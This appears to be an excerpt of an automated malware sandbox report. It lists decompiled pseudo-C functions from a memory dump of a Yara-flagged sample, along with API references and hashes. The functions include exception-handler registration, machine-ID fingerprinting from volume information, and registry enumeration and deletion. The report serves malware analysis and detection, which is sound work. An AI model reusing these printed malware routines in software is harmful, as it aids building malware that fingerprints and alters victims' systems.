                                                                                                                                                                                                0x00af328f
                                                                                                                                                                                                0x00af324a
                                                                                                                                                                                                0x00af31f7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af31f7
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: af69e7f080b2878b0583c4807da561253e2bec5baf63eb4794f599b0c6522cc8
                                                                                                                                                                                                • Instruction ID: 360533c5c4852170793bf61523d48382e5da9e3ce1f6ccc893345c99e3dad344
                                                                                                                                                                                                • Opcode Fuzzy Hash: af69e7f080b2878b0583c4807da561253e2bec5baf63eb4794f599b0c6522cc8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 08219572605219AADF10ABF9AD45FBA37A8EB75770F20072AF235D71D1EE318A008751
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF5A54, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF5A54(void* __eflags) {
				intOrPtr _t2;
				void* _t6;
				void* _t7;

				_t2 =  *0xb0e684; // 0x4d3f6c8
				 *((intOrPtr*)(_t2 + 0x108))(1, E00AF59F9);
				E00AF5624(_t6, _t7); // executed
				return 0;
			}






                                                                                                                                                                                                0x00af5a54
                                                                                                                                                                                                0x00af5a60
                                                                                                                                                                                                0x00af5a66
                                                                                                                                                                                                0x00af5a6d

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RtlAddVectoredExceptionHandler.NTDLL(00000001,00AF59F9,00AF5CC9), ref: 00AF5A60
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionHandlerVectored
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3310709589-0
                                                                                                                                                                                                • Opcode ID: 11e48847a585f96b96e7af7e86146740c7d221f52374126f574574594a982e79
                                                                                                                                                                                                • Instruction ID: 16737cfd1f58333593e5104f9b285ddc6a4ee935f4f003c8bd053c5b58107ed8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 11e48847a585f96b96e7af7e86146740c7d221f52374126f574574594a982e79
                                                                                                                                                                                                • Instruction Fuzzy Hash: 04B09231640905AACA8067F09E4AAA432D06B30702F0509A0B364CA0A7CED184808641
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF49FE, Relevance: 9.3, APIs: 6, Instructions: 285stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                			E00AF49FE(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0xb0e688; // 0xb20000
					_t125 =  *0xb0e68c; // 0x4d3f890
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E00AFBBCF(_t187) != 0) {
					L4:
					_t134 = _t128; // executed
					_t66 = E00AFB7EA(_t134,  &_v516); // executed
					_push(_t134);
					_v1104 = _t66;
					E00AFB6BF(_t66,  &_v1076, _t206, _t208);
					_t129 = E00AF49BA( &_v1076,  &_v1076, _t206);
					_t141 = E00AFD442( &_v1076, E00AFC3BB( &_v1076), 0);
					E00AFB8CC(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E00AF2C82(_t187,  &_v1076, _t206, _t208); // executed
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E00AF92C6(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0xb0e688; // 0xb20000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E00AF91C4(_v1112);
								_t145 = _t130;
								 *0xb0e740 = _t76;
								 *0xb0e738 = E00AF91C4(_t145);
								L17:
								_push(_t145);
								_t80 = E00AF9B24( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
								_t188 = _t80;
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0xb0b9c6);
								E00AF9F13(0xe); // executed
								E00AF9F37(_t188, _t208, _t130); // executed
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb; // executed
								E00AFA076(_t188, _t178, _t208); // executed
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E00AFA3D8(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E00AFA3D8(_t188, _t180, _t208); // executed
								}
								_t87 = E00AF97ED(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2; // executed
								_t89 = E00AFA076(_t153, _t181, _t208); // executed
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0xb0e688; // 0xb20000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E00AFFC57(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0xb0e688; // 0xb20000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E00AFE280(_t183);
										}
										E00AF52B3( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0xb0e688; // 0xb20000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E00AF109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E00AF85B6( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0xb20228
									_t153 = _t51;
									L25:
									_t90 = E00AF5532(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0xb0e688; // 0xb20000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E00AFC2D4(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0xb0e684; // 0x4d3f6c8
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0xb0e684; // 0x4d3f6c8
								 *((intOrPtr*)(_t109 + 0x30))();
								E00AF85FB( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E00AF85FB( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E00AFE2C8(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E00AF95C2(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E00AFC02E(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E00AF85B6( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E00AF2B97( &_v1044, _t192, 0x105); // executed
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}
































































                                                                                                                                                                                                0x00af49fe
                                                                                                                                                                                                0x00af4a0b
                                                                                                                                                                                                0x00af4a16
                                                                                                                                                                                                0x00af4a1b
                                                                                                                                                                                                0x00af4a1d
                                                                                                                                                                                                0x00af4a20
                                                                                                                                                                                                0x00af4a25
                                                                                                                                                                                                0x00af4a28
                                                                                                                                                                                                0x00af4a32
                                                                                                                                                                                                0x00af4a34
                                                                                                                                                                                                0x00af4a41
                                                                                                                                                                                                0x00af4a4a
                                                                                                                                                                                                0x00af4a4a
                                                                                                                                                                                                0x00af4a57
                                                                                                                                                                                                0x00af4a72
                                                                                                                                                                                                0x00af4a79
                                                                                                                                                                                                0x00af4a7b
                                                                                                                                                                                                0x00af4a80
                                                                                                                                                                                                0x00af4a85
                                                                                                                                                                                                0x00af4a8b
                                                                                                                                                                                                0x00af4a9a
                                                                                                                                                                                                0x00af4ab9
                                                                                                                                                                                                0x00af4abb
                                                                                                                                                                                                0x00af4ac1
                                                                                                                                                                                                0x00af4ac7
                                                                                                                                                                                                0x00af4acc
                                                                                                                                                                                                0x00af4ad0
                                                                                                                                                                                                0x00af4ad3
                                                                                                                                                                                                0x00af4add
                                                                                                                                                                                                0x00af4adf
                                                                                                                                                                                                0x00af4ae0
                                                                                                                                                                                                0x00af4aeb
                                                                                                                                                                                                0x00af4aed
                                                                                                                                                                                                0x00af4af0
                                                                                                                                                                                                0x00af4af5
                                                                                                                                                                                                0x00af4afc
                                                                                                                                                                                                0x00af4b51
                                                                                                                                                                                                0x00af4b51
                                                                                                                                                                                                0x00af4b56
                                                                                                                                                                                                0x00af4bbd
                                                                                                                                                                                                0x00af4bc2
                                                                                                                                                                                                0x00af4bc4
                                                                                                                                                                                                0x00af4bce
                                                                                                                                                                                                0x00af4bd3
                                                                                                                                                                                                0x00af4bd3
                                                                                                                                                                                                0x00af4be8
                                                                                                                                                                                                0x00af4bed
                                                                                                                                                                                                0x00af4bef
                                                                                                                                                                                                0x00af4bf2
                                                                                                                                                                                                0x00af4bf4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4bfa
                                                                                                                                                                                                0x00af4c04
                                                                                                                                                                                                0x00af4c0d
                                                                                                                                                                                                0x00af4c12
                                                                                                                                                                                                0x00af4c15
                                                                                                                                                                                                0x00af4c1b
                                                                                                                                                                                                0x00af4c21
                                                                                                                                                                                                0x00af4c29
                                                                                                                                                                                                0x00af4c2b
                                                                                                                                                                                                0x00af4c2e
                                                                                                                                                                                                0x00af4c2f
                                                                                                                                                                                                0x00af4c34
                                                                                                                                                                                                0x00af4c37
                                                                                                                                                                                                0x00af4c3a
                                                                                                                                                                                                0x00af4c3c
                                                                                                                                                                                                0x00af4c40
                                                                                                                                                                                                0x00af4c40
                                                                                                                                                                                                0x00af4c45
                                                                                                                                                                                                0x00af4c48
                                                                                                                                                                                                0x00af4c4a
                                                                                                                                                                                                0x00af4c4e
                                                                                                                                                                                                0x00af4c4e
                                                                                                                                                                                                0x00af4c55
                                                                                                                                                                                                0x00af4c5a
                                                                                                                                                                                                0x00af4c5c
                                                                                                                                                                                                0x00af4c60
                                                                                                                                                                                                0x00af4c62
                                                                                                                                                                                                0x00af4c68
                                                                                                                                                                                                0x00af4c6c
                                                                                                                                                                                                0x00af4c6f
                                                                                                                                                                                                0x00af4c70
                                                                                                                                                                                                0x00af4c75
                                                                                                                                                                                                0x00af4c78
                                                                                                                                                                                                0x00af4c7d
                                                                                                                                                                                                0x00af4ca5
                                                                                                                                                                                                0x00af4cab
                                                                                                                                                                                                0x00af4cb2
                                                                                                                                                                                                0x00af4cc1
                                                                                                                                                                                                0x00af4cc6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4cc6
                                                                                                                                                                                                0x00af4cb4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4c7f
                                                                                                                                                                                                0x00af4c7f
                                                                                                                                                                                                0x00af4c84
                                                                                                                                                                                                0x00af4c8b
                                                                                                                                                                                                0x00af4cd0
                                                                                                                                                                                                0x00af4cd0
                                                                                                                                                                                                0x00af4cd7
                                                                                                                                                                                                0x00af4cdb
                                                                                                                                                                                                0x00af4cdc
                                                                                                                                                                                                0x00af4cdc
                                                                                                                                                                                                0x00af4ce6
                                                                                                                                                                                                0x00af4ceb
                                                                                                                                                                                                0x00af4cee
                                                                                                                                                                                                0x00af4cef
                                                                                                                                                                                                0x00af4cf1
                                                                                                                                                                                                0x00af4cf3
                                                                                                                                                                                                0x00af4cf8
                                                                                                                                                                                                0x00af4cff
                                                                                                                                                                                                0x00af4d42
                                                                                                                                                                                                0x00af4d01
                                                                                                                                                                                                0x00af4d06
                                                                                                                                                                                                0x00af4d0e
                                                                                                                                                                                                0x00af4d12
                                                                                                                                                                                                0x00af4d1d
                                                                                                                                                                                                0x00af4d28
                                                                                                                                                                                                0x00af4d30
                                                                                                                                                                                                0x00af4d34
                                                                                                                                                                                                0x00af4d3c
                                                                                                                                                                                                0x00af4d3c
                                                                                                                                                                                                0x00af4cff
                                                                                                                                                                                                0x00af4d48
                                                                                                                                                                                                0x00af4d4b
                                                                                                                                                                                                0x00af4d4d
                                                                                                                                                                                                0x00af4d53
                                                                                                                                                                                                0x00af4d53
                                                                                                                                                                                                0x00af4d55
                                                                                                                                                                                                0x00af4d55
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4d55
                                                                                                                                                                                                0x00af4c8d
                                                                                                                                                                                                0x00af4c8d
                                                                                                                                                                                                0x00af4c93
                                                                                                                                                                                                0x00af4c95
                                                                                                                                                                                                0x00af4c9a
                                                                                                                                                                                                0x00af4c9a
                                                                                                                                                                                                0x00af4c9c
                                                                                                                                                                                                0x00af4ccb
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4ccb
                                                                                                                                                                                                0x00af4c9e
                                                                                                                                                                                                0x00af4ad7
                                                                                                                                                                                                0x00af4ad7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4ad7
                                                                                                                                                                                                0x00af4c7d
                                                                                                                                                                                                0x00af4b5c
                                                                                                                                                                                                0x00af4b6a
                                                                                                                                                                                                0x00af4b7d
                                                                                                                                                                                                0x00af4b82
                                                                                                                                                                                                0x00af4b88
                                                                                                                                                                                                0x00af4b8a
                                                                                                                                                                                                0x00af4ba2
                                                                                                                                                                                                0x00af4ba7
                                                                                                                                                                                                0x00af4bb0
                                                                                                                                                                                                0x00af4bb6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4bb6
                                                                                                                                                                                                0x00af4b92
                                                                                                                                                                                                0x00af4b9b
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4b9b
                                                                                                                                                                                                0x00af4afe
                                                                                                                                                                                                0x00af4b04
                                                                                                                                                                                                0x00af4b06
                                                                                                                                                                                                0x00af4b44
                                                                                                                                                                                                0x00af4b46
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4b48
                                                                                                                                                                                                0x00af4b4c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4b4c
                                                                                                                                                                                                0x00af4b08
                                                                                                                                                                                                0x00af4b12
                                                                                                                                                                                                0x00af4b1e
                                                                                                                                                                                                0x00af4b29
                                                                                                                                                                                                0x00af4b30
                                                                                                                                                                                                0x00af4b3a
                                                                                                                                                                                                0x00af4b3f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4b3f
                                                                                                                                                                                                0x00af4ad5
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4a59
                                                                                                                                                                                                0x00af4a64
                                                                                                                                                                                                0x00af4a6a
                                                                                                                                                                                                0x00af4a6c
                                                                                                                                                                                                0x00af4d57
                                                                                                                                                                                                0x00af4d57
                                                                                                                                                                                                0x00af4d59
                                                                                                                                                                                                0x00af4d5f
                                                                                                                                                                                                0x00af4d5f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4a6c

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$lstrcpy$memset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1985475764-0
                                                                                                                                                                                                • Opcode ID: 5efeae36f5d956cbb4802db829bcb033228a75e3bd53ee02b1ba2b7ead5c8702
                                                                                                                                                                                                • Instruction ID: 1287619009077a845f2288d204bad624ff49175983b4143a28590407fa31f22e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5efeae36f5d956cbb4802db829bcb033228a75e3bd53ee02b1ba2b7ead5c8702
                                                                                                                                                                                                • Instruction Fuzzy Hash: F891ED71604308AFE714EBA4DE46F7B73E9AB98310F104A2DF6958B2D1EF70D9058B52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF6195, Relevance: 7.6, APIs: 5, Instructions: 145registryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 80%
                                                                                                                                                                                                			E00AF6195(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				void* _t53;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t53 = E00AF85E5(0x3fff); // executed
				_t98 = _t53;
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E00AF85E5(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						RegCloseKey(_v8);
					}
					E00AF85FB( &_v32, 0x3fff);
					E00AF85FB( &_v36, 0x800);
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0xb0e68c; // 0x4d3f890
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0xb0e68c; // 0x4d3f890
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0xb0e690; // 0x4d3f968
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0xb0e68c; // 0x4d3f890
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E00AFC3D4(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E00AFB1F3(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0xb0e68c; // 0x4d3f890
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}
































                                                                                                                                                                                                0x00af6195
                                                                                                                                                                                                0x00af6195
                                                                                                                                                                                                0x00af61a1
                                                                                                                                                                                                0x00af61b0
                                                                                                                                                                                                0x00af61b3
                                                                                                                                                                                                0x00af61bd
                                                                                                                                                                                                0x00af61c5
                                                                                                                                                                                                0x00af61c8
                                                                                                                                                                                                0x00af61cb
                                                                                                                                                                                                0x00af61d0
                                                                                                                                                                                                0x00af61d2
                                                                                                                                                                                                0x00af61d5
                                                                                                                                                                                                0x00af61da
                                                                                                                                                                                                0x00af6346
                                                                                                                                                                                                0x00af634a
                                                                                                                                                                                                0x00af634a
                                                                                                                                                                                                0x00af61ea
                                                                                                                                                                                                0x00af61ec
                                                                                                                                                                                                0x00af61f2
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af6215
                                                                                                                                                                                                0x00af6314
                                                                                                                                                                                                0x00af6318
                                                                                                                                                                                                0x00af6322
                                                                                                                                                                                                0x00af6322
                                                                                                                                                                                                0x00af632e
                                                                                                                                                                                                0x00af633c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af6341
                                                                                                                                                                                                0x00af621e
                                                                                                                                                                                                0x00af6222
                                                                                                                                                                                                0x00af6226
                                                                                                                                                                                                0x00af622a
                                                                                                                                                                                                0x00af622e
                                                                                                                                                                                                0x00af622f
                                                                                                                                                                                                0x00af6230
                                                                                                                                                                                                0x00af6231
                                                                                                                                                                                                0x00af6232
                                                                                                                                                                                                0x00af6236
                                                                                                                                                                                                0x00af623d
                                                                                                                                                                                                0x00af623e
                                                                                                                                                                                                0x00af6243
                                                                                                                                                                                                0x00af624e
                                                                                                                                                                                                0x00af6263
                                                                                                                                                                                                0x00af6265
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af626b
                                                                                                                                                                                                0x00af626e
                                                                                                                                                                                                0x00af6276
                                                                                                                                                                                                0x00af6283
                                                                                                                                                                                                0x00af6288
                                                                                                                                                                                                0x00af628b
                                                                                                                                                                                                0x00af6294
                                                                                                                                                                                                0x00af629b
                                                                                                                                                                                                0x00af62ab
                                                                                                                                                                                                0x00af62b5
                                                                                                                                                                                                0x00af62bb
                                                                                                                                                                                                0x00af62bd
                                                                                                                                                                                                0x00af62c2
                                                                                                                                                                                                0x00af62cb
                                                                                                                                                                                                0x00af62cd
                                                                                                                                                                                                0x00af62cf
                                                                                                                                                                                                0x00af62d1
                                                                                                                                                                                                0x00af62db
                                                                                                                                                                                                0x00af62e1
                                                                                                                                                                                                0x00af62e5
                                                                                                                                                                                                0x00af62e9
                                                                                                                                                                                                0x00af62ee
                                                                                                                                                                                                0x00af62f4
                                                                                                                                                                                                0x00af62f6
                                                                                                                                                                                                0x00af62f8
                                                                                                                                                                                                0x00af62f8
                                                                                                                                                                                                0x00af62ff
                                                                                                                                                                                                0x00af62ff
                                                                                                                                                                                                0x00af62e5
                                                                                                                                                                                                0x00af6304
                                                                                                                                                                                                0x00af6304
                                                                                                                                                                                                0x00af6307
                                                                                                                                                                                                0x00af6308
                                                                                                                                                                                                0x00af630b
                                                                                                                                                                                                0x00af630b
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af626e
                                                                                                                                                                                                0x00af6250
                                                                                                                                                                                                0x00af6258
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00AF61B3
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,0002001F,?,?,?,00000001), ref: 00AF620D
                                                                                                                                                                                                • memset.MSVCRT ref: 00AF6276
                                                                                                                                                                                                • memset.MSVCRT ref: 00AF6283
                                                                                                                                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,00000001), ref: 00AF6322
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$AllocateCloseHeapOpen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1886988140-0
                                                                                                                                                                                                • Opcode ID: 1367f1a79a69561b63bd012557ac8354bc29e6950abf605227f5a317279bb159
                                                                                                                                                                                                • Instruction ID: e9e7820189cf11ba8ce92ec940fc875854b9d0d795c6d46469cb9f5a25f405d3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1367f1a79a69561b63bd012557ac8354bc29e6950abf605227f5a317279bb159
                                                                                                                                                                                                • Instruction Fuzzy Hash: B95126B1A0020DAFDB11DFD4DD85FEEBBB8AF04304F114569F605AB191DB749A08CB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFB7EA, Relevance: 7.6, APIs: 5, Instructions: 83stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                			E00AFB7EA(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0xb0e684; // 0x4d3f6c8
				 *((intOrPtr*)(_t23 + 0xb0))( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E00AF95C2(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E00AF85B6( &_v16);
				_t33 = E00AFC3D4(_t43);
				E00AF9621( &(_t43[E00AFC3D4(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E00AFC3D4(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E00AFD442(_t43, E00AFC3D4(_t43) + _t40, 0);
			}
















                                                                                                                                                                                                0x00afb7ea
                                                                                                                                                                                                0x00afb7f3
                                                                                                                                                                                                0x00afb7ff
                                                                                                                                                                                                0x00afb805
                                                                                                                                                                                                0x00afb807
                                                                                                                                                                                                0x00afb80f
                                                                                                                                                                                                0x00afb81d
